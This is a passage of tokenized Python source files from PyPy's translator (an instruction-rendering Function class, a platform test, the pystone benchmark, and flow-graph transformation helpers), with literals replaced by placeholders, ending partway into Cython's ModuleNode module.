<EOL> cmd = MyApplication ( ) <EOL> if not cmd . values [ '<STR_LIT>' ] : <EOL> cmd . help ( ) <EOL> print '<STR_LIT>' , cmd . files <EOL> print '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> import py <EOL> from pypy . tool . ansi_print import ansi_log <EOL> log = py . log . Producer ( "<STR_LIT>" ) <EOL> py . log . setconsumer ( "<STR_LIT>" , ansi_log ) <EOL> from pypy . objspace . flow import model as flowmodel <EOL> from pypy . rpython . ootypesystem import ootype <EOL> from pypy . translator . oosupport . treebuilder import SubOperation <EOL> from pypy . translator . oosupport . metavm import InstructionList , StoreResult <EOL> def render_sub_op ( sub_op , db , generator ) : <EOL> op = sub_op . op <EOL> instr_list = db . genoo . opcodes . get ( op . opname , None ) <EOL> assert instr_list is not None , '<STR_LIT>' % op <EOL> assert isinstance ( instr_list , InstructionList ) <EOL> assert instr_list [ - <NUM_LIT:1> ] is StoreResult , "<STR_LIT>" <EOL> db . cts . lltype_to_cts ( op . result . concretetype ) <EOL> for v in op . args : <EOL> db . cts . lltype_to_cts ( v . concretetype ) <EOL> instr_list = InstructionList ( instr_list [ : - <NUM_LIT:1> ] ) <EOL> instr_list . render ( generator , op ) <EOL> class Function ( object ) : <EOL> auto_propagate_exceptions = False <EOL> def __init__ ( self , db , graph , name = None , is_method = False , is_entrypoint = False ) : <EOL> self . db = db <EOL> self . cts = db . genoo . TypeSystem ( db ) <EOL> self . graph = graph <EOL> self . name = self . cts . escape_name ( name or graph . name ) <EOL> self . is_method = is_method <EOL> self . is_entrypoint = is_entrypoint <EOL> self . generator = None <EOL> self . label_counters = { } <EOL> def current_label ( self , prefix = '<STR_LIT:label>' ) : <EOL> current = self . label_counters . get ( prefix , <NUM_LIT:0> ) <EOL> return '<STR_LIT>' % ( prefix , current ) <EOL> def next_label ( self , prefix = '<STR_LIT:label>' ) : <EOL> current = self . label_counters . get ( prefix , <NUM_LIT:0> ) <EOL> self . label_counters [ prefix ] = current + <NUM_LIT:1> <EOL> return self . current_label ( prefix ) <EOL> def get_name ( self ) : <EOL> return self . name <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def __hash__ ( self ) : <EOL> return hash ( self . graph ) <EOL> def __eq__ ( self , other ) : <EOL> return self . graph == other . graph <EOL> def __ne__ ( self , other ) : <EOL> return not self == other <EOL> def _is_return_block ( self , block ) : <EOL> return ( not block . exits ) and len ( block . inputargs ) == <NUM_LIT:1> <EOL> def _is_raise_block ( self , block ) : <EOL> return ( not block . exits ) and len ( block . inputargs ) == <NUM_LIT:2> <EOL> def _is_exc_handling_block ( self , block ) : <EOL> return block . exitswitch == flowmodel . c_last_exception <EOL> def begin_render ( self ) : <EOL> raise NotImplementedError <EOL> def render_return_block ( self , block ) : <EOL> raise NotImplementedError <EOL> def render_raise_block ( self , block ) : <EOL> raise NotImplementedError <EOL> def begin_try ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def end_try ( self , target_label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def begin_catch ( self , llexitcase ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def end_catch ( self , target_label ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def render ( self , ilasm ) : <EOL> if self . db . graph_name ( self . graph ) is not None and not self . is_method : <EOL> return <EOL> self . ilasm = ilasm <EOL> self . generator = self . _create_generator ( self . ilasm ) <EOL> graph = self . graph <EOL> self . begin_render ( ) <EOL> self . return_block = None <EOL> self . raise_block = None <EOL> for block in graph . iterblocks ( ) : <EOL> if self . _is_return_block ( block ) : <EOL> self . return_block = block <EOL> elif self . _is_raise_block ( block ) : <EOL> self . raise_block = block <EOL> else : <EOL> self . set_label ( self . _get_block_name ( block ) ) <EOL> if self . _is_exc_handling_block ( block ) : <EOL> self . render_exc_handling_block ( block ) <EOL> else : <EOL> self . render_normal_block ( block ) <EOL> self . before_last_blocks ( ) <EOL> if self . raise_block : <EOL> self . set_label ( self . _get_block_name ( self . raise_block ) ) <EOL> self . render_raise_block ( self . raise_block ) <EOL> if self . return_block : <EOL> self . set_label ( self . _get_block_name ( self . return_block ) ) <EOL> self . render_return_block ( self . return_block ) <EOL> self . end_render ( ) <EOL> if not self . is_method : <EOL> self . db . record_function ( self . graph , self . name ) <EOL> def before_last_blocks ( self ) : <EOL> pass <EOL> def render_exc_handling_block ( self , block ) : <EOL> for op in block . operations [ : - <NUM_LIT:1> ] : <EOL> self . _render_op ( op ) <EOL> anyHandler = False <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> continue <EOL> anyHandler = anyHandler or not self . _auto_propagate ( link , block ) <EOL> if block . operations : <EOL> self . begin_try ( anyHandler ) <EOL> self . _render_op ( block . operations [ - <NUM_LIT:1> ] ) <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> self . _setup_link ( link ) <EOL> self . end_try ( self . _get_block_name ( link . target ) , anyHandler ) <EOL> break <EOL> else : <EOL> assert False , "<STR_LIT>" <EOL> if anyHandler : <EOL> self . introduce_exception_conversions ( <EOL> [ link . exitcase for link in block . exits if link . exitcase ] ) <EOL> for link in block . exits : <EOL> if link . exitcase is None : <EOL> continue <EOL> assert issubclass ( link . exitcase , py . builtin . BaseException ) <EOL> if self . _auto_propagate ( link , block ) : <EOL> continue <EOL> ll_meta_exc = link . llexitcase <EOL> self . record_ll_meta_exc ( ll_meta_exc ) <EOL> self . begin_catch ( link . llexitcase ) <EOL> self . store_exception_and_link ( link ) <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . end_catch ( target_label ) <EOL> self . after_except_block ( ) <EOL> def _auto_propagate ( self , link , block ) : <EOL> assert block . exitswitch is flowmodel . c_last_exception <EOL> if not self . auto_propagate_exceptions : <EOL> return False <EOL> if not self . _is_raise_block ( link . target ) : <EOL> return False <EOL> llexc = link . llexitcase <EOL> i = list ( block . exits ) . index ( link ) <EOL> next_links = block . exits [ i + <NUM_LIT:1> : ] <EOL> for next_link in next_links : <EOL> if ootype . subclassof ( llexc , next_link . llexitcase ) : <EOL> return False <EOL> return True <EOL> def introduce_exception_conversions ( self , llexitcases ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def after_except_block ( self ) : <EOL> pass <EOL> def record_ll_meta_exc ( self , ll_meta_exc ) : <EOL> self . db . constant_generator . record_const ( ll_meta_exc ) <EOL> def store_exception_and_link ( self , link ) : <EOL> raise NotImplementedError <EOL> def render_normal_block ( self , block ) : <EOL> for op in block . operations : <EOL> self . _render_op ( op ) <EOL> if block . exitswitch is None : <EOL> assert len ( block . exits ) == <NUM_LIT:1> <EOL> link = block . exits [ <NUM_LIT:0> ] <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> elif block . exitswitch . concretetype is ootype . Bool : <EOL> self . render_bool_switch ( block ) <EOL> elif block . exitswitch . concretetype in ( ootype . Signed , ootype . SignedLongLong , <EOL> ootype . Unsigned , ootype . UnsignedLongLong , <EOL> ootype . Char , ootype . UniChar ) : <EOL> self . render_numeric_switch ( block ) <EOL> else : <EOL> assert False , '<STR_LIT>' % block . exitswitch . concretetype <EOL> def render_bool_switch ( self , block ) : <EOL> assert len ( block . exits ) == <NUM_LIT:2> <EOL> for link in block . exits : <EOL> if link . exitcase : <EOL> link_true = link <EOL> else : <EOL> link_false = link <EOL> true_label = self . next_label ( '<STR_LIT>' ) <EOL> self . generator . load ( block . exitswitch ) <EOL> self . generator . branch_conditionally ( True , true_label ) <EOL> self . _follow_link ( link_false ) <EOL> self . set_label ( true_label ) <EOL> self . _follow_link ( link_true ) <EOL> def render_numeric_switch ( self , block ) : <EOL> log . WARNING ( "<STR_LIT>" ) <EOL> self . render_numeric_switch_naive ( block ) <EOL> def _collect_switch_cases ( self , block ) : <EOL> cases = { } <EOL> for link in block . exits : <EOL> if link . exitcase == "<STR_LIT:default>" : <EOL> default = link , self . next_label ( '<STR_LIT>' ) <EOL> else : <EOL> if block . exitswitch . concretetype in ( ootype . Char , ootype . UniChar ) : <EOL> value = ord ( link . exitcase ) <EOL> else : <EOL> value = link . exitcase <EOL> cases [ value ] = link , self . next_label ( '<STR_LIT>' ) <EOL> values = cases . keys ( ) <EOL> try : <EOL> min_case = min ( values ) <EOL> max_case = max ( values ) <EOL> except ValueError : <EOL> min_case = max_case = <NUM_LIT:0> <EOL> return cases , min_case , max_case , default <EOL> def _is_sparse_switch ( self , cases , min_case , max_case ) : <EOL> if max_case - min_case > <NUM_LIT:3> * len ( cases ) + <NUM_LIT:10> : <EOL> return True <EOL> return False <EOL> def render_switch_case ( self , link , label ) : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . set_label ( label ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> def render_numeric_switch_naive ( self , block ) : <EOL> for link in block . exits : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> if link . exitcase == '<STR_LIT:default>' : <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> else : <EOL> next_case = self . next_label ( '<STR_LIT>' ) <EOL> self . generator . push_primitive_constant ( block . exitswitch . concretetype , link . exitcase ) <EOL> self . generator . load ( block . exitswitch ) <EOL> self . generator . branch_if_not_equal ( next_case ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> self . set_label ( next_case ) <EOL> def _follow_link ( self , link ) : <EOL> target_label = self . _get_block_name ( link . target ) <EOL> self . _setup_link ( link ) <EOL> self . generator . branch_unconditionally ( target_label ) <EOL> def _setup_link ( self , link ) : <EOL> target = link . target <EOL> linkvars = [ ] <EOL> for to_load , to_store in zip ( link . args , target . inputargs ) : <EOL> if isinstance ( to_load , flowmodel . Variable ) and to_load . name == to_store . name : <EOL> continue <EOL> if to_load . concretetype is ootype . Void : <EOL> continue <EOL> linkvars . append ( ( to_load , to_store ) ) <EOL> if self . _trace_enabled ( ) : <EOL> self . _trace ( '<STR_LIT>' , writeline = True ) <EOL> for to_load , to_store in linkvars : <EOL> self . _trace_value ( '<STR_LIT>' % ( to_store , to_load ) , to_load ) <EOL> self . _trace ( '<STR_LIT>' , writeline = True ) <EOL> for to_load , to_store in linkvars : <EOL> self . generator . load ( to_load ) <EOL> for to_load , to_store in reversed ( linkvars ) : <EOL> self . generator . store ( to_store ) <EOL> def _trace_enabled ( self ) : <EOL> return False <EOL> def _trace ( self , s ) : <EOL> raise NotImplementedError <EOL> def _trace_value ( self , prompt , v ) : <EOL> raise NotImplementedError <EOL> def _render_op ( self , op ) : <EOL> instr_list = self . db . genoo . opcodes . get ( op . opname , None ) <EOL> assert instr_list is not None , '<STR_LIT>' % op <EOL> assert isinstance ( instr_list , InstructionList ) <EOL> if self . _trace_enabled ( ) : <EOL> self . _trace ( str ( op ) , writeline = True ) <EOL> for i , arg in enumerate ( op . args ) : <EOL> self . _trace_value ( '<STR_LIT>' % i , arg ) <EOL> instr_list . render ( self . generator , op ) <EOL> if self . _trace_enabled ( ) : <EOL> self . _trace_value ( '<STR_LIT>' , op . result ) <EOL> def _get_block_name ( self , block ) : <EOL> return '<STR_LIT>' % self . blocknum [ block ] <EOL> def _set_locals ( self ) : <EOL> self . blocknum = { } <EOL> graph = self . graph <EOL> mix = [ graph . getreturnvar ( ) ] <EOL> for block in graph . iterblocks ( ) : <EOL> self . blocknum [ block ] = len ( self . blocknum ) <EOL> mix . extend ( block . inputargs ) <EOL> for op in block . operations : <EOL> mix . extend ( op . args ) <EOL> mix . append ( op . result ) <EOL> if getattr ( op , "<STR_LIT>" , None ) is not None : <EOL> cleanup_finally , cleanup_except = op . cleanup <EOL> for cleanupop in cleanup_finally + cleanup_except : <EOL> mix . extend ( cleanupop . args ) <EOL> mix . append ( cleanupop . result ) <EOL> for link in block . exits : <EOL> mix . extend ( link . getextravars ( ) ) <EOL> mix . extend ( link . args ) <EOL> args = { } <EOL> for ctstype , name in self . args : <EOL> args [ name ] = True <EOL> locals = [ ] <EOL> seen = { } <EOL> for v in mix : <EOL> is_var = isinstance ( v , flowmodel . Variable ) <EOL> if id ( v ) not in seen and is_var and v . name not in args and v . concretetype is not ootype . Void : <EOL> locals . append ( self . cts . llvar_to_cts ( v ) ) <EOL> seen [ id ( v ) ] = True <EOL> self . locals = locals <EOL> def _set_args ( self ) : <EOL> args = [ arg for arg in self . graph . getargs ( ) if arg . concretetype is not ootype . Void ] <EOL> self . args = map ( self . cts . llvar_to_cts , args ) <EOL> self . argset = set ( [ argname for argtype , argname in self . args ] ) </s>
<s> from pypy . translator . platform . test . test_platform import TestPlatform as BasicTest <EOL> from pypy . translator . platform . distutils_platform import DistutilsPlatform <EOL> import py <EOL> class TestDistutils ( BasicTest ) : <EOL> platform = DistutilsPlatform ( ) <EOL> def test_nice_errors ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> LOOPS = <NUM_LIT> <EOL> class G ( object ) : pass <EOL> g = G ( ) <EOL> import sys <EOL> from time import clock <EOL> __version__ = "<STR_LIT>" <EOL> [ Ident1 , Ident2 , Ident3 , Ident4 , Ident5 ] = range ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> class Record ( object ) : <EOL> def __init__ ( self , PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , <EOL> IntComp = <NUM_LIT:0> , StringComp = "<STR_LIT>" ) : <EOL> self . PtrComp = PtrComp <EOL> self . Discr = Discr <EOL> self . EnumComp = EnumComp <EOL> self . IntComp = IntComp <EOL> self . StringComp = StringComp <EOL> def copy ( self ) : <EOL> return Record ( self . PtrComp , self . Discr , self . EnumComp , <EOL> self . IntComp , self . StringComp ) <EOL> TRUE = <NUM_LIT:1> <EOL> FALSE = <NUM_LIT:0> <EOL> def main ( loops = LOOPS ) : <EOL> benchtime , stones = pystones ( abs ( loops ) ) <EOL> if loops >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" % ( __version__ , loops , benchtime ) <EOL> print "<STR_LIT>" % stones <EOL> def pystones ( loops = LOOPS ) : <EOL> return Proc0 ( loops ) <EOL> g . IntGlob = <NUM_LIT:0> <EOL> g . BoolGlob = FALSE <EOL> g . Char1Glob = '<STR_LIT>' <EOL> g . Char2Glob = '<STR_LIT>' <EOL> g . Array1Glob = [ <NUM_LIT:0> ] * <NUM_LIT> <EOL> g . Array2Glob = map ( lambda x : x [ : ] , [ g . Array1Glob ] * <NUM_LIT> ) <EOL> g . PtrGlb = None <EOL> g . PtrGlbNext = None <EOL> def Proc0 ( loops = LOOPS ) : <EOL> starttime = clock ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < loops : <EOL> i += <NUM_LIT:1> <EOL> nulltime = clock ( ) - starttime <EOL> g . PtrGlbNext = Record ( ) <EOL> g . PtrGlb = Record ( ) <EOL> g . PtrGlb . PtrComp = g . PtrGlbNext <EOL> g . PtrGlb . Discr = Ident1 <EOL> g . PtrGlb . EnumComp = Ident3 <EOL> g . PtrGlb . IntComp = <NUM_LIT> <EOL> g . PtrGlb . StringComp = "<STR_LIT>" <EOL> String1Loc = "<STR_LIT>" <EOL> g . Array2Glob [ <NUM_LIT:8> ] [ <NUM_LIT:7> ] = <NUM_LIT:10> <EOL> EnumLoc = None <EOL> starttime = clock ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < loops : <EOL> Proc5 ( ) <EOL> Proc4 ( ) <EOL> IntLoc1 = <NUM_LIT:2> <EOL> IntLoc2 = <NUM_LIT:3> <EOL> String2Loc = "<STR_LIT>" <EOL> EnumLoc = Ident2 <EOL> g . BoolGlob = not Func2 ( String1Loc , String2Loc ) <EOL> while IntLoc1 < IntLoc2 : <EOL> IntLoc3 = <NUM_LIT:5> * IntLoc1 - IntLoc2 <EOL> IntLoc3 = Proc7 ( IntLoc1 , IntLoc2 ) <EOL> IntLoc1 = IntLoc1 + <NUM_LIT:1> <EOL> Proc8 ( g . Array1Glob , g . Array2Glob , IntLoc1 , IntLoc3 ) <EOL> g . PtrGlb = Proc1 ( g . PtrGlb ) <EOL> CharIndex = '<STR_LIT:A>' <EOL> while CharIndex <= g . Char2Glob : <EOL> if EnumLoc == Func1 ( CharIndex , '<STR_LIT:C>' ) : <EOL> EnumLoc = Proc6 ( Ident1 ) <EOL> CharIndex = chr ( ord ( CharIndex ) + <NUM_LIT:1> ) <EOL> IntLoc3 = IntLoc2 * IntLoc1 <EOL> IntLoc2 = IntLoc3 / IntLoc1 <EOL> IntLoc2 = <NUM_LIT:7> * ( IntLoc3 - IntLoc2 ) - IntLoc1 <EOL> IntLoc1 = Proc2 ( IntLoc1 ) <EOL> i += <NUM_LIT:1> <EOL> benchtime = clock ( ) - starttime - nulltime <EOL> if benchtime < <NUM_LIT> : <EOL> benchtime = <NUM_LIT> <EOL> return benchtime , ( loops / benchtime ) <EOL> def Proc1 ( PtrParIn ) : <EOL> PtrParIn . PtrComp = NextRecord = g . PtrGlb . copy ( ) <EOL> PtrParIn . IntComp = <NUM_LIT:5> <EOL> NextRecord . IntComp = PtrParIn . IntComp <EOL> NextRecord . PtrComp = PtrParIn . PtrComp <EOL> NextRecord . PtrComp = Proc3 ( NextRecord . PtrComp ) <EOL> if NextRecord . Discr == Ident1 : <EOL> NextRecord . IntComp = <NUM_LIT:6> <EOL> NextRecord . EnumComp = Proc6 ( PtrParIn . EnumComp ) <EOL> NextRecord . PtrComp = g . PtrGlb . PtrComp <EOL> NextRecord . IntComp = Proc7 ( NextRecord . IntComp , <NUM_LIT:10> ) <EOL> else : <EOL> PtrParIn = NextRecord . copy ( ) <EOL> NextRecord . PtrComp = None <EOL> return PtrParIn <EOL> def Proc2 ( IntParIO ) : <EOL> IntLoc = IntParIO + <NUM_LIT:10> <EOL> EnumLoc = None <EOL> while <NUM_LIT:1> : <EOL> if g . Char1Glob == '<STR_LIT:A>' : <EOL> IntLoc = IntLoc - <NUM_LIT:1> <EOL> IntParIO = IntLoc - g . IntGlob <EOL> EnumLoc = Ident1 <EOL> if EnumLoc == Ident1 : <EOL> break <EOL> return IntParIO <EOL> def Proc3 ( PtrParOut ) : <EOL> if g . PtrGlb is not None : <EOL> PtrParOut = g . PtrGlb . PtrComp <EOL> else : <EOL> g . IntGlob = <NUM_LIT:100> <EOL> g . PtrGlb . IntComp = Proc7 ( <NUM_LIT:10> , g . IntGlob ) <EOL> return PtrParOut <EOL> def Proc4 ( ) : <EOL> BoolLoc = g . Char1Glob == '<STR_LIT:A>' <EOL> BoolLoc = BoolLoc or g . BoolGlob <EOL> g . Char2Glob = '<STR_LIT:B>' <EOL> def Proc5 ( ) : <EOL> g . Char1Glob = '<STR_LIT:A>' <EOL> g . BoolGlob = FALSE <EOL> def Proc6 ( EnumParIn ) : <EOL> EnumParOut = EnumParIn <EOL> if not Func3 ( EnumParIn ) : <EOL> EnumParOut = Ident4 <EOL> if EnumParIn == Ident1 : <EOL> EnumParOut = Ident1 <EOL> elif EnumParIn == Ident2 : <EOL> if g . IntGlob > <NUM_LIT:100> : <EOL> EnumParOut = Ident1 <EOL> else : <EOL> EnumParOut = Ident4 <EOL> elif EnumParIn == Ident3 : <EOL> EnumParOut = Ident2 <EOL> elif EnumParIn == Ident4 : <EOL> pass <EOL> elif EnumParIn == Ident5 : <EOL> EnumParOut = Ident3 <EOL> return EnumParOut <EOL> def Proc7 ( IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:2> <EOL> IntParOut = IntParI2 + IntLoc <EOL> return IntParOut <EOL> def Proc8 ( Array1Par , Array2Par , IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:5> <EOL> Array1Par [ IntLoc ] = IntParI2 <EOL> Array1Par [ IntLoc + <NUM_LIT:1> ] = Array1Par [ IntLoc ] <EOL> Array1Par [ IntLoc + <NUM_LIT:30> ] = IntLoc <EOL> for IntIndex in range ( IntLoc , IntLoc + <NUM_LIT:2> ) : <EOL> Array2Par [ IntLoc ] [ IntIndex ] = IntLoc <EOL> Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] = Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> Array2Par [ IntLoc + <NUM_LIT:20> ] [ IntLoc ] = Array1Par [ IntLoc ] <EOL> g . IntGlob = <NUM_LIT:5> <EOL> def Func1 ( CharPar1 , CharPar2 ) : <EOL> CharLoc1 = CharPar1 <EOL> CharLoc2 = CharLoc1 <EOL> if CharLoc2 != CharPar2 : <EOL> return Ident1 <EOL> else : <EOL> return Ident2 <EOL> def Func2 ( StrParI1 , StrParI2 ) : <EOL> IntLoc = <NUM_LIT:1> <EOL> while IntLoc <= <NUM_LIT:1> : <EOL> if Func1 ( StrParI1 [ IntLoc ] , StrParI2 [ IntLoc + <NUM_LIT:1> ] ) == Ident1 : <EOL> CharLoc = '<STR_LIT:A>' <EOL> IntLoc = IntLoc + <NUM_LIT:1> <EOL> if CharLoc >= '<STR_LIT>' and CharLoc <= '<STR_LIT>' : <EOL> IntLoc = <NUM_LIT:7> <EOL> if CharLoc == '<STR_LIT:X>' : <EOL> return TRUE <EOL> else : <EOL> if StrParI1 > StrParI2 : <EOL> IntLoc = IntLoc + <NUM_LIT:7> <EOL> return TRUE <EOL> else : <EOL> return FALSE <EOL> def Func3 ( EnumParIn ) : <EOL> EnumLoc = EnumParIn <EOL> if EnumLoc == Ident3 : return TRUE <EOL> return FALSE <EOL> def error ( msg ) : <EOL> print >> sys . stderr , msg , <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( <NUM_LIT:100> ) <EOL> def entrypoint ( loops = None ) : <EOL> import string <EOL> print string . replace ( "<STR_LIT>" , "<STR_LIT:s>" , "<STR_LIT:x>" ) <EOL> if loops is None : <EOL> loops = LOOPS <EOL> nargs = len ( sys . argv ) - <NUM_LIT:1> <EOL> if nargs > <NUM_LIT:1> : <EOL> error ( "<STR_LIT>" % nargs ) <EOL> elif nargs == <NUM_LIT:1> : <EOL> try : loops = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> error ( "<STR_LIT>" % sys . argv [ <NUM_LIT:1> ] ) <EOL> else : <EOL> if hasattr ( sys , '<STR_LIT>' ) : <EOL> loops = LOOPS / <NUM_LIT> <EOL> main ( loops ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> entrypoint ( ) </s>
<s> from pypy . objspace . flow . model import * <EOL> def copyvar ( annotator , v ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( v , Variable ) <EOL> newvar = Variable ( v ) <EOL> if annotator is not None and v in annotator . bindings : <EOL> annotator . transfer_binding ( newvar , v ) <EOL> if hasattr ( v , '<STR_LIT>' ) : <EOL> newvar . concretetype = v . concretetype <EOL> return newvar <EOL> def varoftype ( concretetype , name = None ) : <EOL> var = Variable ( name ) <EOL> var . concretetype = concretetype <EOL> return var <EOL> def insert_empty_block ( annotator , link , newops = [ ] ) : <EOL> """<STR_LIT>""" <EOL> vars = { } <EOL> for v in link . args : <EOL> if isinstance ( v , Variable ) : <EOL> vars [ v ] = True <EOL> for op in newops : <EOL> for v in op . args : <EOL> if isinstance ( v , Variable ) : <EOL> vars . setdefault ( v , True ) <EOL> vars [ op . result ] = False <EOL> vars = [ v for v , keep in vars . items ( ) if keep ] <EOL> mapping = { } <EOL> for v in vars : <EOL> mapping [ v ] = copyvar ( annotator , v ) <EOL> newblock = Block ( vars ) <EOL> newblock . operations . extend ( newops ) <EOL> newblock . closeblock ( Link ( link . args , link . target ) ) <EOL> newblock . renamevariables ( mapping ) <EOL> link . args [ : ] = vars <EOL> link . target = newblock <EOL> return newblock <EOL> def insert_empty_startblock ( annotator , graph ) : <EOL> vars = [ copyvar ( annotator , v ) for v in graph . startblock . inputargs ] <EOL> newblock = Block ( vars ) <EOL> newblock . closeblock ( Link ( vars , graph . startblock ) ) <EOL> graph . startblock . isstartblock = False <EOL> graph . startblock = newblock <EOL> graph . startblock . isstartblock = True <EOL> def starts_with_empty_block ( graph ) : <EOL> return ( not graph . startblock . operations <EOL> and graph . startblock . exitswitch is None <EOL> and graph . startblock . exits [ <NUM_LIT:0> ] . args == graph . getargs ( ) ) <EOL> def split_block ( annotator , block , index , _forcelink = None ) : <EOL> """<STR_LIT>""" <EOL> assert <NUM_LIT:0> <= index <= len ( block . operations ) <EOL> if block . exitswitch == c_last_exception : <EOL> assert index < len ( block . operations ) <EOL> varmap = { } <EOL> vars_produced_in_new_block = { } <EOL> def get_new_name ( var ) : <EOL> if var is None : <EOL> return None <EOL> if isinstance ( var , Constant ) : <EOL> return var <EOL> if var in vars_produced_in_new_block : <EOL> return var <EOL> if var not in varmap : <EOL> varmap [ var ] = copyvar ( annotator , var ) <EOL> return varmap [ var ] <EOL> moved_operations = block . operations [ index : ] <EOL> new_moved_ops = [ ] <EOL> for op in moved_operations : <EOL> newop = SpaceOperation ( op . opname , <EOL> [ get_new_name ( arg ) for arg in op . args ] , <EOL> op . result ) <EOL> new_moved_ops . append ( newop ) <EOL> vars_produced_in_new_block [ op . result ] = True <EOL> moved_operations = new_moved_ops <EOL> links = block . exits <EOL> block . exits = None <EOL> for link in links : <EOL> for i , arg in enumerate ( link . args ) : <EOL> if link . args [ i ] not in [ link . last_exception , link . last_exc_value ] : <EOL> link . args [ i ] = get_new_name ( link . args [ i ] ) <EOL> exitswitch = get_new_name ( block . exitswitch ) <EOL> if _forcelink is not None : <EOL> assert index == <NUM_LIT:0> <EOL> linkargs = list ( _forcelink ) <EOL> else : <EOL> linkargs = varmap . keys ( ) <EOL> newblock = Block ( [ get_new_name ( v ) for v in linkargs ] ) <EOL> newblock . operations = moved_operations <EOL> newblock . recloseblock ( * links ) <EOL> newblock . exitswitch = exitswitch <EOL> link = Link ( linkargs , newblock ) <EOL> block . operations = block . operations [ : index ] <EOL> block . recloseblock ( link ) <EOL> block . exitswitch = None <EOL> return link <EOL> def split_block_at_start ( annotator , block ) : <EOL> return split_block ( annotator , block , <NUM_LIT:0> , _forcelink = block . inputargs ) <EOL> def remove_direct_loops ( annotator , graph ) : <EOL> """<STR_LIT>""" <EOL> def visit ( link ) : <EOL> if isinstance ( link , Link ) and link . prevblock is link . target : <EOL> insert_empty_block ( annotator , link ) <EOL> traverse ( visit , graph ) <EOL> def remove_double_links ( annotator , graph ) : <EOL> """<STR_LIT>""" <EOL> def visit ( block ) : <EOL> if isinstance ( block , Block ) : <EOL> double_links = [ ] <EOL> seen = { } <EOL> for link in block . exits : <EOL> if link . target in seen : <EOL> double_links . append ( link ) <EOL> seen [ link . target ] = True <EOL> for link in double_links : <EOL> insert_empty_block ( annotator , link ) <EOL> traverse ( visit , graph ) <EOL> def no_links_to_startblock ( graph ) : <EOL> """<STR_LIT>""" <EOL> links_to_start_block = False <EOL> for block in graph . iterblocks ( ) : <EOL> for link in block . exits : <EOL> if link . target == graph . startblock : <EOL> links_to_start_block = True <EOL> break <EOL> if links_to_start_block : <EOL> insert_empty_startblock ( None , graph ) <EOL> def call_final_function ( translator , final_func , annhelper = None ) : <EOL> """<STR_LIT>""" <EOL> from pypy . annotation import model as annmodel <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . annlowlevel import MixLevelHelperAnnotator <EOL> own_annhelper = ( annhelper is None ) <EOL> if own_annhelper : <EOL> annhelper = MixLevelHelperAnnotator ( translator . rtyper ) <EOL> c_final_func = annhelper . constfunc ( final_func , [ ] , annmodel . s_None ) <EOL> if own_annhelper : <EOL> annhelper . finish ( ) <EOL> entry_point = translator . graphs [ <NUM_LIT:0> ] <EOL> v = copyvar ( translator . annotator , entry_point . getreturnvar ( ) ) <EOL> extrablock = Block ( [ v ] ) <EOL> v_none = varoftype ( lltype . Void ) <EOL> newop = SpaceOperation ( '<STR_LIT>' , [ c_final_func ] , v_none ) <EOL> extrablock . operations = [ newop ] <EOL> extrablock . closeblock ( Link ( [ v ] , entry_point . returnblock ) ) <EOL> for block in entry_point . iterblocks ( ) : <EOL> if block is not extrablock : <EOL> for link in block . exits : <EOL> if link . target is entry_point . returnblock : <EOL> link . target = extrablock <EOL> checkgraph ( entry_point ) </s>
<s> import os , time <EOL> from PyrexTypes import CPtrType <EOL> import Future <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import Annotate <EOL> import Code <EOL> import Naming <EOL> import Nodes <EOL> import Options <EOL> import PyrexTypes <EOL> import TypeSlots <EOL> import Version <EOL> from Errors import error , warning <EOL> from PyrexTypes import py_object_type <EOL> from Cython . Utils import open_new_file , replace_suffix , UtilityCode <EOL> from StringEncoding import escape_byte_string , EncodedString <EOL> def check_c_declarations ( module_node ) : <EOL> module_node . scope . check_c_classes ( ) <EOL> module_node . scope . check_c_functions ( ) <EOL> return module_node <EOL> class ModuleNode ( Nodes . Node , Nodes . BlockNode ) : <EOL> child_attrs = [ "<STR_LIT:body>" ] <EOL> directives = None <EOL> def analyse_declarations ( self , env ) : <EOL> if Options . embed_pos_in_docstring : <EOL> env . doc = EncodedString ( u'<STR_LIT>' % Nodes . relative_position ( self . pos ) ) <EOL> if not self . doc is None : <EOL> env . doc = EncodedString ( env . doc + u'<STR_LIT:\n>' + self . doc ) <EOL> env . doc . encoding = self . doc . encoding <EOL> else : <EOL> env . doc = self . doc <EOL> env . directives = self . directives <EOL> self . body . analyse_declarations ( env ) <EOL> def process_implementation ( self , options , result ) : <EOL> env = self . scope <EOL> env . return_type = PyrexTypes . c_void_type <EOL> self . referenced_modules = 